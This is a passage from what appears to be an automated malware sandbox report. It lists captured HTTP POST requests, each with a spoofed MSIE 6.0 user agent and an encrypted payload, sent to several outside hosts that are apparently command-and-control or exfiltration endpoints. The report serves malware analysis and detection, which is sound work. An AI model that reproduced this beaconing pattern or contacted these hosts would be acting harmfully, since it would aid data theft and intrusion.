4e 61 51 5a 6e 67 72 2f 2f 2f 79 4c 41 6f 4e 4a 6e 64 49 48 2b 61 38 53 55 41 67 4f 34 37 45 62 62 50 6c 74 54 6f 4b 67 65 47 64 46 66 73 46 41 6a 45 31 31 55 45 47 65 36 70 61 55 53 6b 55 2b 37 4f 66 34 4e 7a 55 30 42 35 48 34 43 32 69 46 61 4d 6f 41 78 4d 37 6a 7a 6a 42 41 65 38 6c 44 6b 4f 73 71 72 7a 5a 44 50 53 66 50 2f 43 4d 44 6c 77 70 75 46 77 62 6b 42 68 42 37 6b 4a 75 6b 46 5a 56 52 72 66 54 6b 4d 42 42 69 32 4b 30 Data Ascii: +sKQLc1cEcuSFCBxRFdPh4Ya+Eo7lPxJUXpwbBoYUSdpa7JorEjXzKtP+a81515Rb4t9kAR9qnUerviWnqf1A+WMC4AtbbipFrRFwap8poKjVVwa1+cRhuGSmloJ7seAZ+tEd6p020KobQDXRYbrSJ9Me+dBV08f+Fo5HonPqUWlj1Wk4EmQeUYJUrbDpAMmM/Jnz4xvhfrUxpz9bU2mr+weiZBxKf9kyJ7jRCyMMC6tnBlNu5Wl7M5BZxAawAbEjDzgUI3sgjrJllCy7cdJcjVI2MXjtFY/1d598VNDL5GBpHg4S5PK+MvkKbecqOSVWpn27K15UoITxurXy7+SAt+ROQSh5QxgIuZlM3DWVXPnu/U6ayEPKeQcRdg/4SNkcbSO4Qzq0H08/GGV4W3Tr6gILV3fUUvc5KRCheDvQNaQZngr///yLAoNJndIH+a8SUAgO47EbbPltToKgeGdFfsFAjE11UEGe6paUSkU+7Of4NzU0B5H4C2iFaMoAxM7jzjBAe8lDkOsqrzZDPSfP/CMDlwpuFwbkBhB7kJukFZVRrfTkMBBi2K0
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 71 37 39 6d 4c 73 46 6a 45 63 73 59 6b 4d 5a 55 6f 4f 72 6f 4e 35 70 64 33 4c 34 2f 2b 4e 6f 52 68 56 34 4f 55 45 4d 2b 70 34 51 33 41 63 43 6d 4f 6a 68 6e 48 6c 7a 69 67 5a 6a 4b 34 6f 6f 4e 35 68 44 52 4d 52 70 70 32 6c 4e 61 68 51 6a 30 4e 67 57 77 52 66 66 48 71 72 32 56 6c 56 54 66 5a 69 58 51 61 48 6e 53 45 56 4f 38 2b 36 69 2b 6b 31 54 79 4c 4a 2b 48 45 7a 30 62 54 30 6e 4a 32 66 75 35 35 7a 62 6a 56 36 47 38 54 4c 71 5a 6e 53 4a 57 65 34 30 62 69 4e 41 2f 7a 39 75 32 79 78 67 47 53 35 6d 46 59 78 67 49 77 38 36 4d 6a 4d 37 57 6e 43 56 31 37 74 30 54 67 79 35 49 66 45 4e 41 55 31 61 43 57 5a 33 45 6d 38 36 30 74 36 68 52 4d 68 2b 50 54 63 71 36 76 6d 6a 51 67 32 38 47 31 58 5a 4d 36 74 71 70 34 79 2b 6b 4f 61 4d 4b 78 30 72 74 57 31 36 62 42 69 42 7a 57 4a 61 59 63 72 7a 62 4b 2f 4a 33 72 67 65 69 32 7a 69 64 54 36 65 78 5a 74 35 36 30 44 52 50 45 47 6c 33 70 4a 30 33 2f 6c 54 5a 66 55 6f 41 6b 37 47 63 49 47 30 4a 65 4a 63 48 59 51 33 74 67 47 48 65 39 39 43 77 6a 6c 7a 77 5a 51 32 53 4d 32 78 4b 65 65 4c 2f 73 6d 64 6e 68 61 49 39 59 42 64 46 4d 64 41 6a 53 53 31 4d 64 4e 76 44 65 4e 4c 41 74 4b 50 35 6f 61 73 6e 6e 56 63 63 49 31 7a 58 50 55 4c 49 59 51 69 37 30 44 33 66 2f 6d 30 2f 67 66 46 76 51 6c 78 61 70 5a 50 55 74 52 72 78 77 73 50 78 49 46 44 4d 38 46 2b 51 61 68 6c 65 37 47 74 4a 6b 61 2b 65 6c 66 73 2f 56 4e 6e 59 4a 54 31 65 63 30 75 56 49 78 55 6f 62 78 4b 70 33 59 36 30 6a 48 36 39 2b 76 4e 38 66 4a 34 43 66 6f 4b 55 76 50 65 6b 7a 2f 47 73 6d 76 76 50 6e 6a 4b 75 55 76 48 55 57 2f 69 43 71 6b 51 41 70 35 4c 2f 4b 73 50 72 57 65 75 6a 47 75 6f 61 30 4e 35 49 35 6e 49 64 39 4e 38 6c 64 78 50 64 64 2b 48 34 70 62 45 63 77 75 41 2b 62 59 53 61 44 43 66 6a 6e 58 6d 5a 39 64 4c 38 55 35 48 4a 70 57 53 72 30 4b 63 66 70 4c 54 5a 36 68 4c 48 6b 70 43 6c 52 54 49 3d Data Ascii: q79mLsFjEcsYkMZUoOroN5pd3L4/+NoRhV4OUEM+p4Q3AcCmOjhnHlzigZjK4ooN5hDRMRpp2lNahQj0NgWwRffHqr2VlVTfZiXQaHnSEVO8+6i+k1TyLJ+HEz0bT0nJ2fu55zbjV6G8TLqZnSJWe40biNA/z9u2yxgGS5mFYxgIw86MjM7WnCV17t0Tgy5IfENAU1aCWZ3Em860t6hRMh+PTcq6vmjQg28G1XZM6tqp4y+kOaMKx0rtW16bBiBzWJaYcrzbK/J3rgei2zidT6exZt560DRPEGl3pJ03/lTZfUoAk7GcIG0JeJcHYQ3tgGHe99CwjlzwZQ2SM2xKeeL/smdnhaI9YBdFMdAjSS1MdNvDeNLAtKP5oasnnVccI1zXPULIYQi70D3f/m0/gfFvQlxapZPUtRrxwsPxIFDM8F+Qahle7GtJka+elfs/VNnYJT1ec0uVIxUobxKp3Y60jH69+vN8fJ4CfoKUvPekz/GsmvvPnjKuUvHUW/iCqkQAp5L/KsPrWeujGuoa0N5I5nId9N8ldxPdd+H4pbEcwuA+bYSaDCfjnXmZ9dL8U5HJpWSr0KcfpLTZ6hLHkpClRTI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 53 39 35 2f 4b 36 46 4c 45 63 74 58 4a 7a 39 7a 41 50 41 71 30 33 72 77 49 49 2b 66 4c 62 74 50 5a 64 51 63 73 34 6f 77 76 57 68 79 2b 75 53 41 55 73 77 7a 6d 4c 6c 79 47 48 33 30 50 68 55 34 4c 37 72 4b 2b 32 6e 50 78 30 61 4b 33 7a 32 61 52 36 45 35 43 74 52 61 49 52 6e 6e 61 51 46 38 78 56 53 54 45 32 6a 74 35 4c 69 51 78 4b 44 37 5a 6a 51 32 6f 43 56 71 34 79 35 56 2f 74 4c 69 72 42 4f 55 58 54 47 36 6f 4c 46 2f 67 39 31 51 2f 59 30 64 37 61 46 50 52 77 44 36 34 56 7a 64 45 7a 4d 74 63 53 2f 46 49 66 6b 52 55 4b 50 45 46 78 6c 79 6e 4f 57 68 6a 57 70 66 32 45 78 54 64 53 49 6d 58 4b 44 67 58 53 38 76 44 73 78 6b 31 66 38 39 69 6d 42 49 55 6e 55 71 31 35 61 6a 53 71 76 79 77 48 43 34 67 38 75 5a 46 2b 72 61 35 32 77 42 41 64 4a 2b 35 7a 30 72 50 50 30 65 4b 79 46 74 42 69 49 48 5a 72 50 4c 70 2b 44 5a 79 31 48 2b 4b 45 72 43 54 43 64 4b 44 73 45 67 63 76 54 32 4e 41 36 72 70 54 39 39 33 36 70 53 50 73 6f 63 58 70 68 4a 6a 6b 54 41 55 52 48 73 66 6f 76 6b 72 4a 37 46 37 76 46 52 70 53 6f 6b 7a 65 4d 46 31 77 63 75 41 36 73 47 67 77 72 45 4a 65 67 52 4e 56 4f 38 32 47 6a 48 78 33 51 59 59 55 4e 5a 48 66 66 72 37 30 4e 5a 30 36 4b 2f 76 43 37 36 38 4f 6c 34 79 6b 61 63 77 31 75 68 76 46 6b 48 73 2f 34 32 62 50 78 70 2f 63 73 6a 55 4a 35 46 4c 4f 73 55 44 74 5a 2b 36 4f 59 2b 78 6d 49 4f 41 6a 71 31 58 6c 50 47 78 37 6d 4d 54 63 64 59 31 33 72 34 69 47 64 45 38 54 61 4a 53 4e 2f 53 55 57 54 59 37 68 59 59 4b 71 6d 43 6f 48 52 4b 73 4a 59 70 45 77 4c 47 78 7a 38 54 6a 49 42 50 50 35 4d 62 50 67 6b 6b 63 55 75 44 57 2f 74 36 69 36 6c 4d 44 31 6b 77 77 55 2b 6a 2b 6c 46 6d 51 6d 77 62 Data Ascii: S95/K6FLEctXJz9zAPAq03rwII+fLbtPZdQcs4owvWhy+uSAUswzmLlyGH30PhU4L7rK+2nPx0aK3z2aR6E5CtRaIRnnaQF8xVSTE2jt5LiQxKD7ZjQ2oCVq4y5V/tLirBOUXTG6oLF/g91Q/Y0d7aFPRwD64VzdEzMtcS/FIfkRUKPEFxlynOWhjWpf2ExTdSImXKDgXS8vDsxk1f89imBIUnUq15ajSqvywHC4g8uZF+ra52wBAdJ+5z0rPP0eKyFtBiIHZrPLp+DZy1H+KErCTCdKDsEgcvT2NA6rpT9936pSPsocXphJjkTAURHsfovkrJ7F7vFRpSokzeMF1wcuA6sGgwrEJegRNVO82GjHx3QYYUNZHffr70NZ06K/vC768Ol4ykacw1uhvFkHs/42bPxp/csjUJ5FLOsUDtZ+6OY+xmIOAjq1XlPGx7mMTcdY13r4iGdE8TaJSN/SUWTY7hYYKqmCoHRKsJYpEwLGxz8TjIBPP5MbPgkkcUuDW/t6i6lMD1kwwU+j+lFmQmwb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 53 54 70 6d 4b 4e 73 78 45 63 74 45 68 79 68 35 38 72 32 4f 52 4d 54 45 66 42 68 68 34 54 53 62 50 34 6b 32 64 35 49 35 45 7a 4b 61 78 34 35 73 49 42 43 58 72 30 44 64 53 44 61 35 72 72 77 6f 79 46 5a 2b 4b 6a 63 2b 5a 45 7a 59 65 47 37 4e 67 32 44 32 65 61 7a 68 39 65 44 6c 4c 66 59 56 57 73 79 75 6f 42 72 4e 45 39 7a 62 63 53 53 39 6c 42 48 42 6d 62 54 58 32 42 69 7a 7a 5a 55 32 32 4e 47 2f 56 6d 75 74 61 73 50 73 75 41 48 30 47 79 55 59 6b 34 6a 39 52 48 35 37 41 55 41 47 71 61 34 59 30 44 45 57 51 4f 4a 4c 52 43 43 53 74 7a 50 4a 61 56 55 41 6c 4e 38 67 55 47 43 6f 77 2b 5a 2f 79 44 33 43 36 4c 47 6c 6b 6d 32 71 74 30 38 73 75 41 41 46 6d 46 38 46 32 65 38 67 36 63 61 4c 32 69 65 45 46 35 39 77 65 6d 4b 39 38 75 5a 70 34 58 35 64 34 31 64 37 2b 4b 4c 51 4d 78 56 35 71 45 51 4d 38 66 6c 65 6c 4f 66 58 63 6b 67 63 58 51 48 4c 5a 4b 33 6d 2b 47 68 44 4e 6b 66 62 35 35 2f 55 55 4c 72 77 64 72 54 62 4a 58 39 6b 55 32 6c 57 32 46 36 4e 31 67 31 6e 36 46 30 34 50 6c 4c 49 71 4f 75 61 4b 7a 78 52 35 33 56 49 70 41 78 75 62 52 63 54 37 75 4b 49 4d 50 77 38 64 6e 47 5a 64 4f 45 49 30 76 53 43 74 2b 66 2b 78 79 2b 59 2f 7a 31 36 74 45 69 2f 75 70 45 65 2f 78 69 52 39 68 45 62 62 50 75 37 47 49 58 6f 77 76 6b 63 35 6d 74 6d 59 36 4c 4f 61 41 6e 78 52 64 58 79 68 30 4b 68 2f 76 39 67 71 50 51 4f 6d 33 4b 54 51 78 5a 6c 54 53 49 64 4d 35 35 34 42 38 67 64 69 74 6b 61 43 4d 69 65 53 44 67 4f 7a 57 77 58 61 41 63 4d 4c 4f 4e 68 7a 57 2b 64 78 33 5a 64 47 72 70 67 42 78 77 52 61 35 72 48 49 39 72 57 65 6e 71 49 38 4a 33 79 59 4b 73 65 65 56 37 77 4c 4a 66 63 61 39 4a 6f 54 4a 63 51 54 33 46 67 6f 48 61 47 2b 71 30 73 6b 67 31 55 6f 6d 4f 6c 54 76 31 34 55 47 76 51 6c 56 56 57 78 63 2b 6b 43 32 64 56 6a 38 39 44 30 77 3d 3d Data Ascii: STpmKNsxEctEhyh58r2ORMTEfBhh4TSbP4k2d5I5EzKax45sIBCXr0DdSDa5rrwoyFZ+Kjc+ZEzYeG7Ng2D2eazh9eDlLfYVWsyuoBrNE9zbcSS9lBHBmbTX2BizzZU22NG/VmutasPsuAH0GyUYk4j9RH57AUAGqa4Y0DEWQOJLRCCStzPJaVUAlN8gUGCow+Z/yD3C6LGlkm2qt08suAAFmF8F2e8g6caL2ieEF59wemK98uZp4X5d41d7+KLQMxV5qEQM8flelOfXckgcXQHLZK3m+GhDNkfb55/UULrwdrTbJX9kU2lW2F6N1g1n6F04PlLIqOuaKzxR53VIpAxubRcT7uKIMPw8dnGZdOEI0vSCt+f+xy+Y/z16tEi/upEe/xiR9hEbbPu7GIXowvkc5mtmY6LOaAnxRdXyh0Kh/v9gqPQOm3KTQxZlTSIdM554B8gditkaCMieSDgOzWwXaAcMLONhzW+dx3ZdGrpgBxwRa5rHI9rWenqI8J3yYKseeV7wLJfca9JoTJcQT3FgoHaG+q0skg1UomOlTv14UGvQlVVWxc+kC2dVj89D0w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 4c 6c 6f 58 58 66 61 6d 38 63 70 50 7a 52 6c 41 55 58 46 41 49 5a 6e 4c 70 37 67 57 71 42 34 6e 69 6e 72 47 4f 78 34 70 64 6f 57 65 35 53 63 6d 37 31 4e 54 73 33 71 43 36 74 4e 36 48 67 49 6c 62 7a 34 4d 71 69 69 77 7a 4c 4d 50 56 75 2f 30 67 66 78 48 45 5a 62 68 58 65 46 72 4d 56 4e 62 57 6f 2f 2f 45 35 48 58 65 36 63 32 4a 7a 79 79 33 31 4b 7a 74 6d 6a 57 77 75 6e 34 77 5a 4f 30 45 4e 45 39 37 4d 62 4b 48 61 34 34 56 68 45 6b 42 50 47 54 71 73 61 42 46 58 6e 38 4b 63 2f 75 5a 2f 34 4f 53 37 41 37 6f 65 4c 54 71 76 2f 65 64 47 43 67 30 42 46 38 37 37 70 50 30 76 54 6f 62 75 52 65 42 76 65 57 4f 54 42 76 47 68 30 65 32 75 6a 51 6d 65 57 64 68 42 31 4e 4c 74 67 35 54 34 44 4b 6f 57 52 45 44 39 2f 30 73 51 77 49 50 6b 43 73 71 5a 56 4a 39 34 62 65 53 4b 6b 79 4b 6c 6e 48 4f 4d 66 69 43 50 78 63 43 55 5a 2f 65 30 65 4a 59 79 63 68 58 30 34 72 72 38 55 61 6f 48 50 2b 6a 4c 72 6c 2b 2b 4e 61 56 35 48 4d 71 41 5a 54 77 6a 52 62 43 55 47 42 61 31 68 41 59 52 52 57 32 64 39 61 44 69 45 6a 68 43 47 31 56 78 42 6f 71 4b 67 77 74 58 6e 6c 44 2f 31 78 32 70 6b 53 66 39 59 38 68 36 44 33 72 31 44 4f 5a 38 45 54 45 62 31 7a 4a 73 48 4b 49 34 2f 6e 75 36 58 72 6a 31 51 79 64 33 61 6e 76 61 52 48 2b 37 4e 2f 4d 51 77 76 70 6e 55 5a 44 4b 69 42 4c 64 6d 6b 64 68 47 32 44 52 2b 57 72 53 70 45 45 6a 54 59 7a 4a 77 4b 61 78 67 36 39 33 4a 79 6c 44 55 6a 33 4e 47 4f 7a 55 31 7a 47 6a 4d 2b 55 6b 52 42 6c 42 76 31 67 73 49 6a 4f 4d 38 62 62 63 4f 4e 45 6c 58 51 71 67 77 5a 65 44 49 68 64 2f 49 57 74 70 50 69 48 65 30 4c 6c 4f 68 68 4e 77 48 4f 75 51 55 66 62 48 52 69 38 55 6c 5a 68 33 63 4c 36 57 56 6f 6c 71 4c 36 52 68 66 4c 77 76 78 35 61 77 38 53 74 58 4f 34 73 4d 74 6d 35 52 72 2b 70 46 49 2f 65 65 76 34 74 59 37 53 65 68 44 7a 63 30 35 70 56 69 73 38 4f 41 3d 3d Data Ascii: LloXXfam8cpPzRlAUXFAIZnLp7gWqB4ninrGOx4pdoWe5Scm71NTs3qC6tN6HgIlbz4MqiiwzLMPVu/0gfxHEZbhXeFrMVNbWo//E5HXe6c2Jzyy31KztmjWwun4wZO0ENE97MbKHa44VhEkBPGTqsaBFXn8Kc/uZ/4OS7A7oeLTqv/edGCg0BF877pP0vTobuReBveWOTBvGh0e2ujQmeWdhB1NLtg5T4DKoWRED9/0sQwIPkCsqZVJ94beSKkyKlnHOMfiCPxcCUZ/e0eJYychX04rr8UaoHP+jLrl++NaV5HMqAZTwjRbCUGBa1hAYRRW2d9aDiEjhCG1VxBoqKgwtXnlD/1x2pkSf9Y8h6D3r1DOZ8ETEb1zJsHKI4/nu6Xrj1Qyd3anvaRH+7N/MQwvpnUZDKiBLdmkdhG2DR+WrSpEEjTYzJwKaxg693JylDUj3NGOzU1zGjM+UkRBlBv1gsIjOM8bbcONElXQqgwZeDIhd/IWtpPiHe0LlOhhNwHOuQUfbHRi8UlZh3cL6WVolqL6RhfLwvx5aw8StXO4sMtm5Rr+pFI/eev4tY7SehDzc05pVis8OA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 2b 30 37 7a 4c 4c 42 58 45 63 74 57 4d 31 77 58 77 34 64 77 42 57 4e 4f 78 6f 39 59 69 49 45 42 35 47 6b 62 2b 4a 38 77 37 49 66 31 4a 64 55 6d 78 73 47 56 6d 35 57 49 5a 53 4b 6b 71 44 69 7a 53 4f 68 78 68 75 4d 65 39 45 71 5a 62 36 77 4d 36 64 64 72 4f 6e 76 4a 6e 32 57 4e 68 35 70 51 6c 55 72 4f 48 69 45 43 48 59 64 2f 39 39 57 57 49 7a 77 46 57 32 4d 65 4e 51 79 54 48 4c 59 41 4f 34 65 65 76 4a 46 56 31 36 63 32 51 42 64 52 5a 59 41 6b 63 2f 78 6b 5a 75 54 4a 4a 76 69 34 48 4d 43 62 5a 58 77 38 77 77 2b 63 57 53 31 5a 6a 62 35 54 52 65 73 64 56 33 48 55 70 4d 71 34 64 71 74 32 69 79 79 4c 35 57 48 56 53 52 50 35 39 32 4e 2f 41 4a 44 78 59 4b 34 66 49 47 64 75 68 73 48 4b 38 4a 2b 53 74 58 4a 54 33 32 71 50 6a 65 4f 34 50 6a 6e 4c 58 77 58 2b 65 61 38 41 50 2b 7a 68 41 58 47 79 67 42 46 65 6e 35 2b 47 6c 77 30 59 56 2b 72 53 42 75 74 33 38 76 55 4e 73 7a 44 46 35 5a 34 6b 31 44 64 73 4c 6f 61 70 6f 65 4a 74 43 71 6e 66 36 38 67 47 37 43 36 4a 49 76 7a 77 78 5a 47 37 2f 34 6a 45 46 37 77 4d 69 34 65 55 62 47 4e 75 4f 31 64 58 30 45 63 4f 46 4d 55 56 56 2b 6c 38 7a 77 51 79 50 59 64 72 47 35 74 32 54 62 74 4f 45 2b 55 6b 52 6f 53 31 6e 71 65 36 58 4e 62 75 73 4a 6e 61 6e 32 45 67 6b 47 69 6d 55 70 33 68 57 5a 58 63 68 56 75 4a 61 52 39 76 6c 57 6d 55 71 71 6b 62 62 43 6a 79 51 7a 72 66 4c 49 44 31 76 44 6e 57 71 43 57 75 45 52 73 6e 34 41 68 77 48 72 70 6a 47 54 32 58 75 49 52 37 55 61 4f 38 48 53 57 4f 55 55 53 79 6e 68 6e 35 46 71 7a 34 46 6a 47 41 6e 47 5a 50 52 6c 63 65 4d 70 78 4e 34 4e 58 52 65 37 4e 50 68 54 48 75 6e 38 4f 6c 71 55 38 47 49 6c 74 42 4a 38 32 5a 58 75 58 72 7a 48 71 6a 45 2b 41 6e 47 65 73 38 6c 35 71 79 4a 68 62 68 4e 45 36 6c 42 32 70 54 32 4f 61 4a 45 5a 5a 6d 44 65 46 47 65 41 30 34 66 39 75 4a 70 30 46 7a 71 52 67 36 51 54 4c 62 6b 75 64 58 Data Ascii: +07zLLBXEctWM1wXw4dwBWNOxo9YiIEB5Gkb+J8w7If1JdUmxsGVm5WIZSKkqDizSOhxhuMe9EqZb6wM6ddrOnvJn2WNh5pQlUrOHiECHYd/99WWIzwFW2MeNQyTHLYAO4eevJFV16c2QBdRZYAkc/xkZuTJJvi4HMCbZXw8ww+cWS1Zjb5TResdV3HUpMq4dqt2iyyL5WHVSRP592N/AJDxYK4fIGduhsHK8J+StXJT32qPjeO4PjnLXwX+ea8AP+zhAXGygBFen5+Glw0YV+rSBut38vUNszDF5Z4k1DdsLoapoeJtCqnf68gG7C6JIvzwxZG7/4jEF7wMi4eUbGNuO1dX0EcOFMUVV+l8zwQyPYdrG5t2TbtOE+UkRoS1nqe6XNbusJnan2EgkGimUp3hWZXchVuJaR9vlWmUqqkbbCjyQzrfLID1vDnWqCWuERsn4AhwHrpjGT2XuIR7UaO8HSWOUUSynhn5Fqz4FjGAnGZPRlceMpxN4NXRe7NPhTHun8OlqU8GIltBJ82ZXuXrzHqjE+AnGes8l5qyJhbhNE6lB2pT2OaJEZZmDeFGeA04f9uJp0FzqRg6QTLbkudX
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 77 56 71 54 4b 30 4e 4d 45 63 75 71 41 4b 73 75 53 6f 51 39 34 32 79 58 79 30 44 70 6e 2f 4d 37 4a 31 35 41 73 69 73 38 4f 6a 7a 38 62 76 46 36 72 69 68 50 79 79 70 4d 59 65 78 2f 2b 61 5a 74 30 76 43 6c 49 4a 37 46 65 4a 6d 56 54 53 35 4d 75 5a 69 37 39 6e 75 37 51 56 69 77 39 31 65 55 77 73 4e 6e 4e 2b 56 56 67 78 59 37 73 51 69 42 37 67 30 6f 53 6f 45 65 36 70 36 4f 73 7a 33 74 6b 42 74 33 72 39 54 5a 46 33 63 77 52 50 58 4f 54 49 67 4b 51 47 66 51 47 48 4e 59 35 57 6b 71 33 78 4c 73 66 4f 49 37 4b 6d 62 55 72 75 52 70 4c 4e 4d 50 65 54 4c 4c 41 6e 46 70 2b 36 49 59 2b 37 33 33 42 6c 31 4f 75 6e 2f 32 34 45 61 48 61 48 64 69 33 54 68 4d 72 4a 68 4e 45 6c 34 57 64 32 51 79 68 48 59 37 31 71 6d 4d 49 34 77 66 4d 6f 77 4f 62 44 30 59 78 42 75 64 53 67 74 66 48 53 37 68 7a 44 59 4e 67 79 52 69 6a 41 41 75 31 2b 6e 4b 51 4b 79 58 45 38 4f 46 34 4c 54 4f 43 68 71 72 51 65 30 61 31 55 77 42 6c 64 30 77 68 6a 52 73 47 70 6c 6c 4d 65 5a 51 61 74 78 32 66 70 56 43 61 34 31 52 34 35 34 59 76 41 31 53 56 31 4d 68 79 4f 68 45 51 76 30 4c 58 55 37 6e 4f 42 57 45 42 59 51 76 4f 63 65 32 78 67 30 37 64 38 46 41 6c 67 31 78 6d 4e 30 59 7a 4b 43 4c 75 54 5a 47 6c 55 75 38 56 32 6e 75 50 6a 79 51 34 71 49 4d 70 50 43 2b 65 78 6d 73 62 38 59 43 65 45 30 6f 34 70 6e 74 4b 35 50 33 68 52 61 64 57 61 68 7a 45 44 4f 74 4e 62 73 58 35 6a 47 5a 49 71 52 49 4a 67 6a 56 4b 39 54 41 68 34 79 45 43 49 57 64 45 5a 72 6f 59 44 51 52 72 34 37 4a 47 64 58 50 62 7a 30 55 62 39 58 37 75 73 78 4e 69 57 48 4a 4d 4a 33 64 6e 69 30 45 77 77 51 4f 4a 53 6d 4f 64 77 36 7a 66 6f 44 65 6f 4c 55 52 79 6e 68 43 38 76 74 65 Data Ascii: wVqTK0NMEcuqAKsuSoQ942yXy0Dpn/M7J15Asis8Ojz8bvF6rihPyypMYex/+aZt0vClIJ7FeJmVTS5MuZi79nu7QViw91eUwsNnN+VVgxY7sQiB7g0oSoEe6p6Osz3tkBt3r9TZF3cwRPXOTIgKQGfQGHNY5Wkq3xLsfOI7KmbUruRpLNMPeTLLAnFp+6IY+733Bl1Oun/24EaHaHdi3ThMrJhNEl4Wd2QyhHY71qmMI4wfMowObD0YxBudSgtfHS7hzDYNgyRijAAu1+nKQKyXE8OF4LTOChqrQe0a1UwBld0whjRsGpllMeZQatx2fpVCa41R454YvA1SV1MhyOhEQv0LXU7nOBWEBYQvOce2xg07d8FAlg1xmN0YzKCLuTZGlUu8V2nuPjyQ4qIMpPC+exmsb8YCeE0o4pntK5P3hRadWahzEDOtNbsX5jGZIqRIJgjVK9TAh4yECIWdEZroYDQRr47JGdXPbz0Ub9X7usxNiWHJMJ3dni0EwwQOJSmOdw6zfoDeoLURynhC8vte
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 71 49 75 67 38 6c 4d 54 49 4d 74 52 31 52 53 34 47 67 44 65 4e 2f 79 38 6c 70 55 35 48 4f 53 4c 4e 34 37 50 74 75 73 63 52 5a 53 55 4e 4e 45 77 62 44 50 53 6a 30 49 57 33 32 6f 70 34 78 57 31 61 4a 74 4b 52 64 56 32 68 33 2f 37 31 48 53 50 71 77 2f 4b 35 64 69 6b 63 77 4a 70 65 53 59 37 79 54 4c 77 7a 72 55 4e 30 6b 56 34 78 32 44 79 58 41 43 55 2f 52 52 6a 71 72 6d 53 6e 79 33 6e 64 33 38 64 62 34 42 56 2f 64 66 52 54 4c 73 35 49 68 44 56 41 74 36 41 55 63 31 30 63 67 65 6f 42 71 4e 65 71 45 4e 78 55 32 69 66 52 53 32 38 4a 59 6e 46 45 53 34 73 69 4a 57 75 4d 6a 53 46 4c 4a 4d 75 75 50 37 67 35 51 33 4e 64 34 6e 74 4e 31 73 41 54 75 70 56 51 38 32 59 4b 62 55 64 57 61 49 47 49 73 43 6e 34 34 2b 69 70 73 71 55 37 4d 56 31 6a 42 4b 35 52 78 7a 33 73 76 37 63 63 5a 78 32 2f 6b 6f 37 53 4a 30 33 31 4a 64 75 35 63 61 62 51 70 48 34 36 54 62 6a 6c 30 67 74 41 55 61 58 42 2f 6b 66 6d 48 49 6b 35 39 48 73 2f 71 37 77 46 4e 69 49 35 48 31 67 76 6d 4f 6c 56 62 63 55 6c 62 6d 5a 39 6d 70 78 45 33 6e 59 73 5a 50 72 32 6b 2b 74 4e 68 53 32 2f 4f 71 74 44 56 54 78 69 67 72 59 59 52 63 77 61 48 7a 63 33 72 57 50 69 30 58 7a 37 47 64 63 65 30 41 75 2b 54 45 7a 35 4d 49 75 32 45 58 35 7a 68 4b 7a 66 33 4b 57 30 31 67 6e 56 50 61 74 58 50 56 34 7a 51 39 30 45 53 74 66 79 62 7a 35 78 59 43 30 6e 44 30 49 46 63 73 52 50 78 67 43 54 39 71 4c 38 4d 66 61 4f 36 6e 72 4a 53 33 59 79 2f 74 31 6c 58 69 78 44 52 72 4c 37 73 67 77 55 59 58 49 32 57 61 42 61 4a 2b 58 2b 5a 75 59 38 6e 63 4d 44 74 53 75 58 2f 45 31 74 62 2f 42 50 48 35 38 4e 4b 66 64 54 64 77 4e 71 35 59 72 32 77 64 52 49 33 66 67 48 59 2f 49 45 51 3d 3d Data Ascii: qIug8lMTIMtR1RS4GgDeN/y8lpU5HOSLN47PtuscRZSUNNEwbDPSj0IW32op4xW1aJtKRdV2h3/71HSPqw/K5dikcwJpeSY7yTLwzrUN0kV4x2DyXACU/RRjqrmSny3nd38db4BV/dfRTLs5IhDVAt6AUc10cgeoBqNeqENxU2ifRS28JYnFES4siJWuMjSFLJMuuP7g5Q3Nd4ntN1sATupVQ82YKbUdWaIGIsCn44+ipsqU7MV1jBK5Rxz3sv7ccZx2/ko7SJ031Jdu5cabQpH46Tbjl0gtAUaXB/kfmHIk59Hs/q7wFNiI5H1gvmOlVbcUlbmZ9mpxE3nYsZPr2k+tNhS2/OqtDVTxigrYYRcwaHzc3rWPi0Xz7Gdce0Au+TEz5MIu2EX5zhKzf3KW01gnVPatXPV4zQ90EStfybz5xYC0nD0IFcsRPxgCT9qL8MfaO6nrJS3Yy/t1lXixDRrL7sgwUYXI2WaBaJ+X+ZuY8ncMDtSuX/E1tb/BPH58NKfdTdwNq5Yr2wdRI3fgHY/IEQ==
